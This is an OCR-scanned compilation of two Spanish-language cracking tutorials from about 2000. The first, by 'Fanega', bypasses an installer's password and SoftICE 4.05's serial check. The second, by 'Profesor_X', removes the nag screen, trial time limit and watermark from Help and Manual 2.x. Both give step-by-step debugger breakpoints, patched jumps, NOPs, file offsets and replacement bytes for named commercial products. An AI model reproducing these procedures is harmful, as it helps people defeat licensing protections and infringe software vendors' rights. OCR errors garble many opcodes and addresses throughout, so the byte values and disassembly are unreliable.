la ventana del password, yo normalmente siempre empiezo por poner los tipicos, pongamos por ejemplo bpx 
messageboxa, bpx dialogboxparama, y bpx getwindowtexta salimos del sice pulsando FS, y bingo hemos tenido suerte con 
uno de los breakpoints concretamete con bpx dialogboxparama, miremos detenidamente la ventana del sice y fijemonos en 
las letras verdes pone algo asi como Kernel etc. Este no es el programa que estamos usando pulsamos F12 se cierra el sice 
y salta la ventana de password, metemos alguna contraseña al azar y pulsamos ok de repente el sice se vuelve a abrir y 
caemos aqui: 


:00401ED5 2D32060000 sub eax, 00000632----Caemos aqui------ 
:00401EDA EB10 jmp 00401EEC 

:00401EDC 68B0C74000 push 0040C7B0 

:00401EE1 6810C84000 push 0040C810 

:00401EF6 FF1580E24000 Call dword ptr [0040E280] 
:00401EEC 83F801 cmp eax, 00000001 

:00401EEF 1BCO0 sbb eax, eax 

:00401EF1 F7D8 neg eax 

:00401EF3 C3 ret 


Debemos tener un poco de paciencia, e ir mirando de vez en cuando que es lo que llevan los registros, en este punto por 
ejemplo si ponemos en el sice d edi y nos situamos con el raton sobre la ventana de datos y la desplazamos un poco hacia 
abajo tenemos una grata sorpresa en mi ordenador concretamente en la posicion de memoria 0167:0040C7BO0, pero como 
el objetivo que nos habiamos fijado era instalar el programa sin el password dejamos el numerito en paz y continuamos 
con lo nuestro, fijate en eax que es igual a O y ve pulsando F10 despues de que el programa haga una serie de operaciones 


con eax lo pone otra vez a 0, y llegamos a la posicion 004025CE 


:004025C7 ESD6F8SFFFF call 00401EA2---llama a las rutinas de comprobacion---- 
:004025CC 850CO0 test eax, eax 

:004025CE 7507 ¡ne 004025D7--Salta si es correcto----- 

:004025D0 BOFES5S mov al, FS 

:004025D2 E96C050000 ¡mp 00402B43 

:004025D7 833D38B0400000 cmp dword ptr [0040B038], 00000000 

:004025DE 751A jne 004025FA 


En este punto regresamos de la llamada a las rutinas de comprobacion, siguiente linea comprueba eax y en la siguiente si 
eax es igual a O no salta y si es diferente de 0 si que salta. 


Aqui podemos hacer dos cosas, si eliminamos el call 00401EA2 nunca nos enseñara la ventana de introducir password y 
seguiria perfectamente la instalacion, pero como ya estamos en la linea 004025CE cambiamos el salto ¡ne por un ¡mp asi 
saltaremos y continuara la instalacion. 


En el sice pon a pulsa enter aparecera 015f:004025CE pon ¡mp 004025D7 y pulsa dos veces enter, ahora pulsamos ES y 
continuamos la instalacion, cuando pasen un par de ventanas nos aparecera la tipica ventana que nos pregunta el nombre, 
compañia y numero de serie, no te preocupes ya que los piratas se encargaron de crackear esto, puedes poner lo que 
quieras, pulsa Ok y pasa la ventana, aqui nos detenemos y pensamos hemos hecho el cambio en memoria pero no en el 
codigo del programa, cuando vuelva a instalar el programa si no cambio el salto en el programa me volvera a pedir el 
password, pero podemos hacerlo de otra manera como el password me lo pide el installshield antes de descomprimir el 
programa si recojo el programa descomprimido del archivo temporal de windows y lo guardo cuando quiera volverlo a 
instalar no me saldra mas la ventana del password. 


Veamos como hacer esto, minimiza la ventana en la que estas y busca la carpeta temp en windows, hay que decir que 
conviene siempre tener el archivo temporal de windows limpio asi sabremos cuales carpetas son las que crea nuestro 
programa, por ejemplo en mi caso crea tres carpetas pero una sola contiene algo y es -ebx0001 que contiene tres carpetas 
mas Disk1, Disk2 y Disk3. como ya sabemos cual es la copiamos a otro sitio y le cambiamos el nombre, ya podremos 
instalarlo cuando queramos sin password. 


Numega Softice 4.05 


Hasta ahora tenia instalada la version 3.2 de este programa y decidi actualizarme, cual ha sido mi sorpresa al ver que no 
me dejaba instalar este programa si no tenia el numero de serie, pero hombre dejame por lo menos que te pruebe a ver si 
eres de mi agrado, pues nanai de la china. 


Bueno vamos a ver como nos apañamos para instalar el softice 4.05, para esto necesitaremos un debuger como yo ya tenia 
el softice 3.2 lo he hecho con este, pero si no tienes ninguno puedes utilizar el Trwin2000 que si te deja probarlo pero con 
limitaciones, he de decir que este ultimo me gustaria mas que el sice si no fuese por los bastantes cuelgues que provoca. 


Empecemos a instalar el sice 4.05 yo lo tengo en una sola carpeta llamada S1405w9x.exe tu a lo mejor lo tienes dividido 
en cuatro archivos comprimidos, lo primero que tienes que hacer es crear una carpeta y descomprimir el sice dentro de 
ella. Sin embargo si lo tienes como yo en un archivo autoejecutable no pinches con el boton izquierdo sobre el porque 
comenzara a instalarse, pincha con el boton derecho sobre el y en el menu que se abre pincha sobre extract to, le indicas la 
carpeta donde se tiene que descomprimir y aceptas. Ya estamos todos iguales con los mismos archivos, abrimos la carpeta 
que hemos creado buscamos setup.exe pinchamos dos veces sobre el y el programa se empieza a instalar, cuando 
lleguemos a la ventana que nos pide el nombre, compañia y numero serie, paramos no porque nos apetezca, sino por que si 
rellenamos las casillas y le damos a Next nos manda un mensaje de error, ¿que podemos hacer? podemos buscar el 
numero de serie valido o intentaremos pasar esta ventana sin mas, vamos a ver la segunda opcion.. 


Volvemos a la ventana anterior pulsando sobre Back, abrimos el sice Ctrl+d y ponemos un breakpoint Bpx 
dialogboxparama este ultimamente me funciona muy bien, le damos a ES para salir del sice y pulsamos Next en la ventana 
de licencia del programa que intentamos instalar, de repente salta el sice pulsamos F12 y aparece la ventana del numero de 
serie, introducimos los datos que nos pide y le damos a Back ¡ojo! he dicho a Back (retroceder en español) y no a Next, 
vuelve a saltar el sice y ya estamos donde queriamos. Cual es el motivo de retroceder y no de avanzar, simplemente 


porque queremos saber donde se hace la llamada a la ventana de registro y saltarnosla, tambien podriamos avanzar pero 
esto lo hacemos siempre, intentar cazar el mensaje de error y luego cambiar un salto precedente para que no nos 
encontremos con el, pero hoy aremos que ni siquiera nos pregunte nombre ni numero de serie. 


Fijemonos en la ventana del sice, en las letras verdes que hay debajo de la ventana de codigo pone Nminst32, ahora mira 
en al ultima linea del sice donde pone Enter a command (H for help) al final de esta linea se ve otro nombre _ins3576, este 
viene a ser el directorio padre el que maneja toda la instalacion y va llamando a librerias y otros archivos, el siguiente paso 
es regresar a el y ¿como? pulsando F12 mira si es facil, despues de pulsar F12 aparecemos aqui: 


:0042A309 FFB580FBFFFF push dword ptr [ebp+FFFFFB80] 

:0042A30F FFB58CFBFFFF push dword ptr [ebp+FFFFFB8C] 

:0042A315 FFB598FBFFFF push dword ptr [ebp+FFFFFB98] 

:0042A31B FFS5CO0 call [ebp-40]----Salto a la ventana de registro------- 

:0042A31E 898570FBFFFF mov dword ptr [ebp+FFFFFB70], eax--estamos aqui----- 
:0042A324 E95B010000 ¡mp 00424484 


Si nos fijamos en la linea superior de donde estamos vemos que es una llamada de la cual acabamos de regresar, esta es la 
llamada que hace aparecer la ventana de registro, podemos quitarla a ver que pasa. 


Primero quitamos los breakpoints que teniamos bc * y luego ponemos otro en esa llamada bpx 0042A31B pulsamos ES y 
regresamos a la ventana de License Agreement en esta ventana pulsamos sobre Yes y saltamos a nuestro bpx en el sice, 
vamos a cambiar la llamada por nada, ponemos a en el sice y aparece 


015f:0042A31B ponemos un NOP pulsamos enter y aparece 

015f:0042A31C ponemos NOP ya sabes enter 

015f:0042A31D ponemos otro NOP dale a enter 

015f:0042A31E y enter, pulsamos ES y ya esta, hemos saltado la ventana donde nos pide el numero de serie y 
continuamos la instalacion perfectamente sin ningun problema, incluso el programa despues funciona bien. 


Ahora nos queda meter el parche en el codigo, sabemos que tenemos que buscar el archivo _ins5576 por lo tanto vamos al 
directorio de donde estamos instalando el sice y vemos que no esta hay, pues vamos a buscarlo siguiendo estos pasos - 
Barra de inicio-Buscar-Archivos o carpetas ponemos el nombre y le damos a buscar, sorpresa no esta por ninguna parte 
del ordenador, ¿tendre algun virus que me hace desaparecer los archivos? la respuesta es no, este archivo es creado 
durante la instalacion del sice en la carpeta de archivos temporales de windows y cuando termina la instacion lo borra, 
entonces ¿como podemos parchearlo si no existe? para esto podemos crear un loader que lo parchee en memoria cuando 
este en ejecucion, yo personalmente he intentado crear un loader con tres programas diferentes y no me aplica el parche en 
ninguna ocasion, esto no se si se debe a algun error mio creando el loader, o es que el loader no aplica bien el parche por 
que el archivo a parchear no es el ejecutable principal. 


En este punto he de decir que estuve a punto de terminar este manual, ya sabia como instalar el programa sin conocer el 
numero de serie pero no sabia como parchear el codigo para cuando volviese a instalarlo no tuviera que volver a utilizar el 
sice, pero se me ocurrio una idea algo descabelleda para mis conocimientos pero que entra mas puramente si cabe en la 
filosofía de la ingenieria inversa, destripar los programas y hacerlos funcionar como a nosotros nos plazca. 


A ver si me se explicar correctamente, cuando ejecutamos setup.exe el programa sigue los siguientes pasos crea unos 
archivos temporales por todo el sistema luego crea un directorio en la carpeta de archivos temporales de windows 
(istmp1.dir) para crear tres archivos dentro de esa carpeta (_ins5576._mp, _wtl951.dll, zdataS1.dll), luego pasa el control 
a un archivo de esa carpeta (_ins5576._mp) que es el encargado de continuar descomprimiendo archivos y realizar la 
instalacion y al finalizarla se borran todos los archivos temporales. 


La idea es la siguiente podriamos cazar los archivos temporales y meterlos en la carpeta donde esta setup.exe y parchear el 
archivo _ins5576._mp para que no salga la ventana de registro y luego hacer que el programa busque este archivo, pero 
para hacer esto primero tendremos que evitar que el programa cree estos archivos y evitar tambien que se descomprima en 
ellos por que nos chafara nuestro crack y finalmente que no borre estos archivos cuando finalice la instalacion ya que en 
teoria son temporales, me ha costado pero lo he conseguido. 


Primero cazaremos los archivos temporales, para ello la carpeta windowsttemp tiene que estar vacia, ahora vamos a 
instalar el sice pulsamos sobre setup.exe primero aparece la ventanita de descompresion, cuando finalice sale la ventana 


azul que nos tapa toda la pantalla, aqui no le damos a ningun boton y minimizamos la ventana entonces nos vamos a 
cAwindowsttemp y abrimos el directorio _istmp1.dir vemos los tres archivos que antes he dicho y otra carpeta _istmp0.dir 
esta carpeta la borramos por que no nos hace falta y ocupa mucho, salimos de la carpeta que estamos y la copiamos dentro 
de la carpeta desde donde estamos instalando el sice y haz otra copia donde quieras por si te equivocas y la instalacion nos 
borra estos archivos, cierra la instalacion que estabamos haciendo, y veras como los archivos de la carpeta temp 
desaparecen pero los que nosotros hemos copiado no, ya los hemos cazado. 


Segundo paso parchear el archivo _ins5576._mp, abramoslo con el w32dasm ¿como que no sabes donde esta? mira dentro 
de la carpeta que acabamos de copiar, buscamos la direccion parchear que es 0042A31B y miramos su offset 2971B 
cerramos el w32dsam y abrimos _ins5576._mp con algun editor Hexadecimal, buscamos el offset 2971B y cuando 
aparecezca el cursor cambiomos los tres primeros Bytes por tres 90, para quitar la llamada a la ventana de registro. 


Tercer paso redirigir la instalacion a nuestros archivos, parece complejo pero no lo es, solo tenemos que decirle cuando 
vaya a crear el directorio de los archivos temporales _istmp1.dir que no lo cree en c:1windowsWtemp si no en donde 
tenemos el nuestro yo por ejemplo lo tengo en c1windowescritoriolsoftice asi que vamos a ello, carguemos con el loader 
del sice setup.exe cuando pare en el inicio del programa ponemos este breakpoint bpx createdirectorya pulsamos FS y 
saltara el sice en nuestro breakpoint pulsamos F12 y ya estamos en la rutina que crea el directorio, de momento esta rutina 
no nos interesa queremos ir donde el programa da la ruta c1windowsWemp para que se creen los archivos temporales, 
pulsamos F12 y caemos en: 


:00405FOC inc ebx--Incrementa ebx en 1 cada vez que no se haya podido crear el directorio para cambiarle el nombre ej: 
_istmpl1.dir, _istmp2.dir, _istmp3.dir etc.---- 

:00405FOD lea eax, [ebp-010C]---Pone c:1windowstemp en eax 

:00405F13 push ebx 

:00405F14 push eax 

:00405F 15 lea eax, [ebp-0214]---Direccion donde pondra el programa la ruta donde crear _istmp%.dir en este caso 
cAwindowstemp ------ 

:00405F1B push 0040F400---lleva el nombre del directorio _istmp%.dir----- 

:00405F20 push eax 

:00405F21 Call USER32.wsprintfA--Pone en la ruta el nombre del directorio c:1windowsWtempl istmp%.dir ------=--- 
:00405F27 add esp, 00000010 

:00405F2A lea eax, [ebp-0214]--Pone en eax la ruta clwindowsWtempl_istmp%.dir ----- 

:00405F30 push eax 


:00405F38 pop ecx 

:00405F39 ¡ne 00405FOC--Salta hacia arriba si no puede crear el directorio----- 
:00405F3B lea eax,[ebp-0214]---carga clwindowsttempl_istmp%.dir en eax ------ 
:00405F41 push eax 

:00405F42 lea eax, [ebp-010C]---carga c:1windowstemp en eax -------- 
:00405F48 push eax 

:00405F49 Call KERNEL32.IstrcpyA---copia [ebp-0214] en [ebp-010C] ------ 
:00405F4F lea eax, [ebp-010C]---- carga c:lwindowstempl_istmp%.dir------ 
:00405F55 push eax 

:00405F36 call 0040634B--Llamada a rutinas que crean archivos---- 
:00405F3B pop ecx 

:00405F5C lea eax,[ebp-010C]---- carga c:1windowsttempl istmp%.dir------ 
:00405F62 push eax 

:00405F63 call 00405171---creando mas archivos---- 

:00405F68 mov esi, eax 

:00405F6A pop ecx 

:00405F6B test esi, es1---comprueba esi------ 

:00405F6D jne 00405F83---Salta si no ha podido crear archivos----- 
:00405F6F lea eax, [ebp-010C]---- carga c:lwindowsttempl_istmp%.din_ins5576._mp ---- 
:00405F75 push 00000001 

:00405F77 push eax 

:00405F78 call 004060D9---Descomprime en la ruta especificada------ 
:00405F7D pop ecx 


:00405F7E test eax, eax 
:00405F80 pop ecx 


Lo primero que debemos hacer es quitar el bpx que teniamos bc * y poner uno donde empieza todo el embrollo bpx 
00405FO0D, salimos del sice con F3 y cerramos la instalacion cuando podamos, volvemos a empezar otra vez ya sabes 
setup.exe y salta el sice en el bpx que hemos puesto si ponemos d ebp-010c veremos en la ventana de datos 
ciwindowsWtemp que es la ruta donde se va a crear todo el embrollo, como lo que nosotros queremos es meter la direccion 
donde tenemos nuestro directorio con el archivo parcheado, vamos a buscarla en la ventana de datos desplazala un poco 
hacia abajo y pronto veras la ruta desde donde estas instalando el programa en mi caso c:1windowstescritoriolsoftice y la 
tengo en la posicion de memoria 0064FBO0O0, pero como esta direccion en otros ordenadores puede no ser la misma tengo 
que poner algo que funcione en todos los ordenadores, por ejemplo ebp-010c es igual a OO64FAF4 que lleva 
eciwindowstemp entonces 0064FB0O0 que lleva c:lwindowstescritoriolsoftice es igual a ebp-0100, te lo explico mejor 
0064FB00-0064FAF4= 12 bytes de diferencia por lo tanto 10C-12= 100 Ok. Entonces en la linea 00405FOD lea eax, [ebp- 
010C] hay que poner 00405FOD lea eax, [ebp-0100], ve mirando los bytes como cambian para despues parchear el codigo. 


Tercer paso engañar al programa para que crea que es su directorio y no el nuestro. 

Ahora todavia no se cargan nuestros archivos, por que el programa al intentar crear el directorio se encuentra con el 
problema de que ya existe uno que es el nuestro, y vuelve otra vez a intentarlo, coge _istmpl.dir que ya existe y sube el 
numero que hay en el nombre, asi sucesivamente hasta que pueda crear un directorio ejemplo: _istmp1.dir, _istmp2.dir, 
:Istmp3.dir etc. ¿como evitar esto? esto lo sabemos de sobra, cuando haga la comprobacion le cambiamos lo que sea para 


que siga el buen camino, en la linea que llama a rutina de creacion del directorio 00405F31 call 0040C9BO pulsamos F8 y 
entramos en la rutina. 


:0040C9BO mov eax, dword ptr [esp+04] 

:0040C9B4 push 00000000 

:0040C9B6 push eax 

:0040C9B7 Call : KERNEL32.CreateDirectoryA---Crea directorio--- 
:0040C9BD test eax, eax 

:0040COBF ¡ne 0040C9C09----Salta si ha podido crear el directorio--- 
:0040C9C1 Call : KERNEL32.GetLastError--error si no crea el directorio--- 
:0040C9C7 ¡mp 0040C9CB 

:0040C9C09 xor eax, eax 

:0040C9CB test eax, eax 

:0040C9CD je 0040C9DC 

:0040C9CF push eax 

:0040C9DO0 call 0040C0BO 

:0040C9DS add esp, 00000004 

:0040C9D8 or eax, FEFFEFEF 

:0040C9DB ret 

:0040C9DC xor eax, eax 

:0040C9DE ret 


Aqui vemos que despues de ir a la funcion Createdirectory hace una comprobacion con eax, y luego salta si ha podido 
crear el directorio o por el contrario sigue si no ha podido crearlo. En este salto es donde vamos a atacar 0O40COBF jne 
0040C9C9 lo cambiamos por 0040C9BF je 0040C9CO9 y el programa ya cree que ha sido el quien ha creado el directorio 
por el contrario es nuestro directorio el que lleva. 


Cuarto paso evitar que se descomprima encima de nuestros archivos y cuando termine la instalacion no nos borre nuestros 
archivos temporales.. 

Aqui tenemos que evitar que el programa se descomprima por que la ruta que lleva es la nuestra y lleva nuestros archivos 
si se descomprime encima nos jode el invento por que desaparecia el parche que antes hemos hecho y seria una instalacion 
normal. Estabamos en la rutina que crea el directorio, pulsamos F12 para salir de ella y vamos pulsando FLO hasta llegar 
aqui 


:00405F63 call 00405171---creando mas archivos---- 

:00405F68 mov esi, eax 

:00405F6A pop ecx 

:00405F6B test esi, esi---comprueba esi------ 

:00405F6D jne 00405F83---Salta si no ha podido crear archivos----- 


:00405F6F lea eax, [ebp-010C]---- carga c:1windowsttempl_istmp%.dir_ins5576._mp ---- 

:00405F75 push 00000001 

:00405F77 push eax 

:00405F78 call 004060D9---Descomprime en la ruta especificada------ 

Revisamos esta parte de codigo que en definitiva viene a decir que si no puede crear el archivo _ins5576._mp salte las 
rutinas de descompresion, esto es lo que buscabamos cambiamos este salto y ya no pasamos por la rutinas de 
descompresion, todavia no lo hagas porque tenemos un problema, supongamos que hemos hecho el cambio y no pasamos 
por las rutinas de descompresion y no nos chafa nuestro parche, muy bien el programa se instala sin pedirnos el numero de 
serie pero cuando termina la instalacion nos borra nuestros tres archivos y el directorio, ¿que hacer para que no nos los 
borre? hay dos soluciones poner un bpx deletefilea para ver cuando se borran los archivos, u otra muy facil que nos la 
ofrece windows. A los tres archivos que tenemos dentro de nuestro directorio les cambiamos las propiedades de 
modificado a solo lectura y ya no los borrara, ¿y que tiene que ver esto con el salto anterior? muy simple al igual que si no 
puede borrar los archivos tampoco los puede modificar o sea que cuando intente crearlos no podra chafarlos y devolvera 
esi como que no pudo crear los archivos y el salto se ejecutara sin pasar por las rutinas de descompresion. Ya lo tenemos 
todo hecho solo queda hacer los cambios en setup.exe estos son los datos para los cambios. 


Code Data ¡Offset | Bytes actuales | Bytes nuevos 


100405FOD | 530D [8D85F4FEFFFF [8D8S00FFFEFF 
0040C9BF [BDBF | 75 | 74 


Y no te olvides de cambiar las propiedades de los archivos. 
Para finalizar decir que hay formas mas faciles de hacerlas pero lo que cuenta es aprender. 


PD: Perdon por las faltas de ortografia, pero mi nivel cultural no pasa de 6” de EGB. 


Un saludo para toda la peña española. 
Por Fanega. 


fanegal O airtel.net 
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Programa: Help and Manual v 2.X 


PROTECCION: NAg Screen y Time Limit 


Descripcion: | Utileria para crear HTML HELP 
Dificultad: A 
DOWNLOAD : http://www.ec-software.com/ 


Herramientas: Softice W32dasm Editor Hexadecimal 
CRACKER: Profesor_X FECHA: 25/07/2000 


INTRODUCCION 


Bueno amigos este es mi 5to. tutorial, este es de un Sharewarecito que verdaderamente 
esta mono, tiene las 

propiedades de crear ayudas para tus programas ya sea WinHelp 32 Hmtl Help y tambien 
la creacion de manuales 

electronicos los cuales con tansolo un click puedes mandarlo a imprimir, 
verdaderamente lo use unos cuantos minutos y 

me parecio una buena utileria. 


AL ATAKE 


Bueno amigos !!EMPECEMOS CON ESTE MENJURGE !!! como siempre lo primero es instalar el 
programa y ver 

que tipo de limitaciones tiene, para empesar cuando ejecutas el H8M lo primero que te sale 
es 


thenextgenerationinhelp-authoóoring 
http4/www_eL-softwafe-Ccom 


Wersion: 2.6.0 
Build: 1161 
Language: English 


Unregistered 
evaluation copy 


Sesion for WindowsI5 € VITRO 


Order info | 
Evaluation period expired 


una ventana diciendote que tienes 14 dias para evaluarlo y dos botones uno de OK y otro de 
ORDER INFO, dentro de 


esa misma ventana viene un texto que dice !! 14 DAYS FOR EVALUATION PERIOD !!! bueno, si das 
click en OK 
se va directamente a abrir el programa !!!'mmmmmmmm!!! como podemos deducir este programa es 


una version demo 
la cual no tiene ningun apartado para insertar un serial solo tiene las siguientes 
protecciones 


1.NAG SCREEN 
2.LIMITE DE TIEMPO 
3.UN STRING QUE APARECE AL SER COMPILADO UN PROYECTO 


entonces manos a la obra a quitar esas protecciones, que les parece si empezamos con el 
limite de tiempo OK!! lo primero 

sera darle una ojeada con el Soft Ice, para eso cargamos el Soft Ice y nos vamos a Symbol 
Loader y seleccionamos el 

ejecutable del HéM 


* NuMega SoftlCE Symbol Loader al ES 
File Edit Module Help 


agave | eras Y el el +4 Y) 


ad SoftiCE is active % 


despues de seleccionarlo damos click o E, nos manda una ventana de a ocurrido un error 
damos click en la opcion donde 

esta el si y saltamos directamente al Soft Ice bueno desde ahi nos vamos dando F10 hasta que 
nos aparesca la Nag Screen y 

damos OK en la Nag Screen y saltamos otra vez al Soft Ice y damos otra vez F10 unas tres 
veces mas y nos encontramos con 

un salto JGE en la direccion de memoria 54b601 y unas lineas mas arriba nos encontramos con 
un CALL en la dirección de 

memoria 54b5f6 quiero comentarles que las direcciones de memoria pueden ser diferentes eh!!! 
, bueno 

continuemos. 


Como pueden ver este salto y esa call son muy sospechosas mmmm!! bueno ahora lo que tenemos 
que hacer es 

probar si ese salto es el que contador de tiempo que les parece si ahora desensamblamos el 
ejecutable de el HéM 

con el Win32dasm y tendremos que esperar un poco ya que es grande el ejecutable , bueno en 
lo que desensambla. 

vean algunos de los diferentes saltos concionales e incondicionales que existen: 


77 cl JA rel8 Salto corto si encima de (CF=0 y ZF=0) 

73 clk JAE rel8 Salto corto si encima de o igual (CF=0) 

72 clk JB rel8 Salto corto si debajo de (CF=1) 

76 clk JBE rel8 Salto corto si debajo de o igual (CF=1 o ZF=1) 
72 cb JC rel8 Salto corto si lleva (CF=1) 

E3 cb JCXZ rel8 Salto corto si el registro CX es 0 


E3 cbk JECXZ rel8 Salto corto si el registro ECX es O 

74 cb JE rel8 Salto corto si igual (ZF=1) 

7F clk JG rel8 Salto corto si mayor (ZF=0 y SF=0F) 

7D cb JGE rel8 Salto corto si mayor o igual (SF=0F) 

7C cb JL rel8 Salto corto si menor (SFOF) 

7E clk JLE rel8 Salto corto si menor o igual (ZF=1 o SF<>0F) 
76 cb JNA rel8 Salto corto si no encima de (CF=1 o ZF=1) 
72 cb JNAE rel8 Salto corto si no encima de o igual (CF=1) 
73 ck JNC rel8 Salto corto si no carry (CF=0) 

75 cb JNE rel8 Salto corto si no igual (ZF=0) 

7E cl JNG rel8 Salto corto si no mayor (ZF=1 o SF<>O0F) 

7C cb JNGE rel8 Salto corto si no mayor o igual (SF<>OF) 
7D cl JNL rel8 Salto corto si no menor (SF=0F) 


7F cb JNLE rel8 Salto corto si no menor o igual (ZF=0 y SF=0F) 

71 cb JNO rel8 Salto corto si no overflow (OF=1) 

7B clk JNP rel8 Salto corto si no paridad (PF=1) 

79 cl JNS rel8 Salto corto si no signo (SF=0) 

75 cb JNZ rel8 Salto corto si no cero (ZF=0) 

70 cb JO rel8 Salto corto si overflow (OF=1) 

7A cb JP rel8 Salto corto si paridad (PF=1) 

7A cb JPE rel8 Salto corto si la paridad igual (PF=1) 

7B cb JPO rel8 Salto corto si la paridad impar (PF=0) 

78 cb JS rel8 Salto corto si signo (SF=1) 

74 cb JZ rel8 Salto corto si cero (ZF=0) 

0F 87 cw/cd JA rel16/32 Salto cercano si encima de (CF=0 y ZF=0) 

0F 83 cw/cd JAE rel16/32 Salto cercano si encima de o igual (CF=0) 

0r 82 cw/cd JB rel1l6/32 Salto cercano si debajo de (CF=1) 

0F 86 cw/cd JBE rel16/32 Salto cercano si debajo de o igual (CF=1 o ZF=1) 
0r 82 cw/cd J 16/32 Salto cercano si carry (CF=1) 

0F 84 cw/cd JE rel16/32 Salto cercano si igual (ZF=1) 

OF 84 cw/cd JZ rel16/32 Salto cercano si 0 (ZF=1) 

OF 8F cw/cd JG rel16/32 Salto cercano si mayor (ZF=0 y SF=0F) 

OF 8D cw/cd JGE rel16/32 Salto cercano si mayor o igual (SF=0F) 

0F 8C cw/cd J 116/32 Salto cercano si menor (SF<>OF) 

0F 8E cw/cd J rell6/32 Salto cercano si menor o igual (ZF=1 o SF<>OF) 
0Fr 86 cw/cd J rel16/32 Salto cercano si no encima de (CF=1 o ZF=1) 

Or 82 cw/cd JNAE rel16/32 Salto cercano si no encima de o igual (CF=1) 

0F 83 cw/cd J rel1l6/32 Salto cercano si no debajo de (CF=0) 

0F 87 cw/cd J rel1l6/32 Salto cercano si no debajo de o igual (CF=0 y ZF=0) 
0Fr 83 cw/cd J rel16/32 Salto cercano si no carry (CF=0) 
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0F 85 cw/cd rel16/32 Salto cercano si no igual (ZF=0) 

OF 8E cw/cd rel1l6/32 Salto cercano si no mayor (ZF=1 o SF<>OF) 
0F 8C cw/cd E rel1l6/32 Salto cercano si no mayor o igual (SF<>0F) 
0Fr 8D cw/cd L rel16/32 Salto cercano si no menor (SF=0F) 

0Fr 8F cw/cd E rel16/32 Salto cercano si no menor o igual (ZF=0 y SF=0F) 
Or 81 cw/cd JNO rel16/32 Salto cercano si no overflow (OF=0) 

OF 8B cw/cd JNP rel16/32 Salto cercano si no paridad (PF=0) 

0F 89 cw/cd JNS rel16/32 Salto cercano si no signo (SF=0) 

0F 85 cw/cd JNZ rel16/32 Salto cercano si no cero (ZF=0) 

OF 80 cw/cd JO rel16/32 Salto cercano si overflow (OF=1) 

OF 8A cw/cd JP rel16/32 Salto cercano si paridad (PF=1) 

Or 8A cw/cd JPE rel16/32 Salto cercano si paridad igual (PF=1) 

Or 8B cw/cd JPO rel16/32 Salto cercano si paridad impar (PF=0) 

0Fr 88 cw/cd JS rel16/32 Salto cercano si signo (SF=1) 

0F 84 cw/cd JZ rel16/32 Salto cercano si 0 (ZF=1) 


z 
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EB cb JMP rel8 Salto corto, relativo, desplazamiento rel a la siguiente instruccion 

E9 cw JMP rell6 Salto cercano, relativo, desplazamiento rel a la siguiente instruccion 

FF /4 JMP r/ml16 Salto cercano, absoluto indirecto, dirección determinada en r/ml6 

FF /4 JMP r/m32 Salto cercano, absoluto indirecto, dirección determinada en r/ml6 

EA cb JMP ptr16:16 Salto lejano, absoluto, dirección determinada en operando 

EA cb JMP ptr16:32 Salto lejano, absoluto, dirección determinada en operando 

FF /5 JMP m16:16 Salto lejano, absoluto indirecto, dirección determinada en m16:16 

FF /5 JMP m16:32 Salto lejano, absoluto indirecto, dirección determinada en m16:32 

estos son algunos, de los que me acuerdo ahorita, bueno continuemos !!! ya se desensamblo ? 


por que en la maquina que 
tengo una pentium 100 mhz con 48 en ram vaya que si tarda lleva casi 10 minutos y apenas va 
procesando los jmp addreses 


vaya Vaya !!! antes de continuar tengo que esperar que termine mmmmmm !! bueno regreso voy a 
echarme un TRAGO!!! 
mmmmm!!! que rico trago mmmmmmm!!! verdaderamente que rica es el AGUA DE LIMON !'mmmmm!!! me 


creerian que 

todavia no termina, que se me hace que me voy a cenar una torta española por cierto saludos 
a KArpoff !! AMIGISIMO !!!, 

BUENO YA REGRESE ahora si continuemos. 


Y | 
Una vez desensamblado no vamos a eh insertamos en la ventana que aparece 


Goto Code Location (32 Bit) 


la direccion de memoria que vimos en el Soft Ice que fue 54b601 y nos manda a la parte del 
codigo donde se 
encuentra el salto sospechoso : 


como podemos ver ese salto hace la comparación de que si es mayor o igual a 14 el programa 
ya no se ejecuta y continua con 

la siguiente linea, OK ! bueno que les parece si el JGE lo cambiamos por un salto 
incondicional JMP que salte no importando 

el valor que tenga salte!! como lo haremos , pues muy facil . vemos su offset que es: 


0014aa01 le sacamos una copia a el ejecutable del H8M y la copia la abrimos con el heditor 
hexadecimal en mi caso yo uso 
el Hexwork Shop y damos Control G e insertamos el offset y nos manda a 


00144394 (0088 0083 ¿850 007D OSEB EBO2 EBFF (2. EP 
0014AA08|86B03 E879 9CEE FF6B OJBA 74B7 5400|...y......t.T. 


y en la parte donde esta 007D05 solo cambiamos el 7D por EB y guardamos los cambios, vamos y 
probamos 

adelantando la fecha un mes mas o menos y ejecutamos el ejecutable modificado y damos click 
en el boton de OK! 

111! VOILA !!! limite de tiempo crackeado, ya solo nos falta quitar la molesta Nag Screen 
que sale al principio para 

hacer esto solo apuntamos el offset de la CALL que se encuentra tres lineas arriba del salto 


-OOS4BSEF SB00 mov eax, dword ptr [eax] 


:0054B5F6 A138025500 mov eax, dword ptr [00550238] 
:DO54B5FE 8B00D mov eax, dword ptr [eax] 
:0054B5FD 83785000 cmp dword ptr [eax+50], 00000000 
:0054B601 ?DO5 jge 0054B608 

:0054B603 ESESS2EBFF call 004038F0O 


el offset es: POffset 001449F1h in File: HelpMan.exe 


nos vamos al heditor hexadecimal y cambiamos solo los 5 bytes de la llamada (recuerden que 
para que funcione el 
cambio debes de cambiar si son 5 bytes por otros 5 bytes ) osea seria 


E8 = UN BYTE 

32 = UN BYTE 

79 = UN BYTE 

EE = UN BYTE 

Fr = UN BYTE 

5 BYTES EN TOTAL 

los cambiaremos por 5 bytes que anulen esta CALL que serian 9090909090 entonces vayamos a el 


editor 
hexadecimal y busquemos el offset 14A9F1 


0014A9EC | 0055 Mt a Eran Ale ass | loo o cto o olJalÚ) 


nos presenta la pantalla esto E83279EEFF y lo cambiamos y quedaria asi 


0014A9EC|0055 008B 0090 9090 9090 A138 0255|.U.........8.U 


una vez cambiado salvamos los cambios y ejecutamos el programa y LISTO PROGRAMA CRACKEADO 
rra 


solo falta quitar el string que sale al compilar un proyecto bueno para eso buscamos : THIS 
PROYEC WAS 

COMPILED WHIT A UNREGISTERED VERSION OF HELP AND MANUAL THIS DONT APPER IN A 

REGISTERED VERSION !!! en el editor hexadecimal y solamente lo borramos y LISTO AHORA SI 
PROGRAMA CRACKEADO!!!! 


bueno amigos terminamos espero que les sirva este tutorial, una cosa mas si gustas que tus 
tutoriales esten en la 

nueva compilacion de tutoriales, solo mandarmelos a mi email y yo me comunicare con ustedes. 
111 Y 

RECUERDEN ESTE TUTORIAL ES SOLO PARA AUMENTAR TUS CONOCIMIENTOS !!! SI TE GUSTA EL 
PROGRAMILLA !!! COMPRALO!!!! 


Profesor_X 
